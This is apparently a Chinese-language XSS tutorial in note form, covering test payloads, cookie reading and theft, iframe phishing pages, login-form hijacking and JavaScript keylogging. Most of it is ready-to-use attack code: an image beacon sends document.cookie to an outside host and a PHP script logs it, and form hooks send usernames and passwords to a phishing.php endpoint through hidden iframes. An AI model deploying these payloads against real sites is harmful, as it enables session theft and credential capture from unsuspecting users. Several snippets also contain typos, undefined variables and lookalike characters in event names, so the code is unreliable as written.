一.入门
<html>
<head>test</head>
<meta http-equiv="refresh" content="0;">
<body>
<script> alert("xss") </script>
<iframe src="http://www.baidu.com" width=0 height=0></iframe>
</body>
</html>
二.判断是否存在XSS
输入
<script>alert(/XSS/)</script>
<script>alert("XSS")</script>
</textarea> <script> alert(/XSS/) </script> <textarea> #如果被嵌入在textarea中
<img src="javascript:alert('XSS');">
"'><script>document.location.href="http://www.baidu.com"</script> #XSS钓鱼
'><iframe src="http://www.baidu.com" height="100%" width="100%" ></iframe>
三.XSS Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
四.查看Cookie
javascript:alert(document.cookie) 在地址栏输入
五.盗取Cookie
如果网站使用了Httponly的Cookie,可防止Cookie被恶意JavaScript脚本存取
客户端
<script>
img=new Image();
img.src="http://www.baidu.com/cookie.asp?cookie="+document.cookie;
img.width=0;
mg.height=0;
</script>
php远端
<?php
$cookie=$_GET['cookie'];
$log=fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>
六.跨站钓鱼
<html>
<head>
<meta charset="UTF-8">
<title></title>
</head>
<body scroll="no">
<iframe src="http://www.baidu.com" height="100%" width="100%" scrolling="auto" frameborder="0" οnlοad="this.style.height=document.body.clientHeight"></iframe>
</body>
</html>
七.JavaScript劫持HTML表单
<script>
Form=document.forms["userslogin"];
Form.οnsubmit=function(){
var iframe=document.createElement("iframe");
iframe.style.display="none";
alert(Form.user.value)
iframe.src="http://127.0.0.1/phishing.php?user="+Form.user.value+"&passs="+Form.pass.value;
document.body.appendChild(iframe);
}
</script>
或者使用
<script>
loginForm=document.forms['userlogin'];
function parseData()
{
var user=loginForm.user.value;
var pass=loginForm.pass.value;
saveData(username,password);
return true;
}
function saveData(username,password)
{
var frame=document.createElement('iframe');
frame.src="http://127.0.0.1/phishing.php?user="+user+"&pass="+pass;
frame.style.display='none';
document.body.appendChild(frame);
}
loginForm.οnsubmit=parseData;
</script>
7.2 键盘记录
劫持onclick事件
for(i=0;i<document.links.length;i++){
document.links[i].οnclick=hijack;
}
监听onkeydown事件
document.οnkeydοwn=function(e){
if(!e) e=window.event;
try{ hijcak(); } catch(ex) { }
}
劫持表单
document.οnkeyup=function(){
document.forms['PassFormlogin'].οnsubmit=function(){
pwd=this.PassInputUsername0.value+'|'+this.PassInputPassword0.value;
log(escape(pwd));
}
}
遍历表单
function grabber(){
F=document.forms;
for(var j=0;j<F.length;++j)
{
f=F[j];
for(i=0;i<f.length;++i)
{
if(f[i].type.toLowerCase()=="password")
{
alert("Password:"+f[i].value)
}
else if(f[i].type.toLowerCase()!="submit")
{
alert("Text:"+f[i].value)
}
}
}
}
在IE浏览器中可以使用以下,捕获特定键
<script>
function keyDown(){
var keycode=event.keyCode;
var realkey=String.fromCharCode(event.keyCode);
alert("按键码: "+keycode+" 字符: "+realkey);
document.οnkeydοwn=keyDown;
}
</script>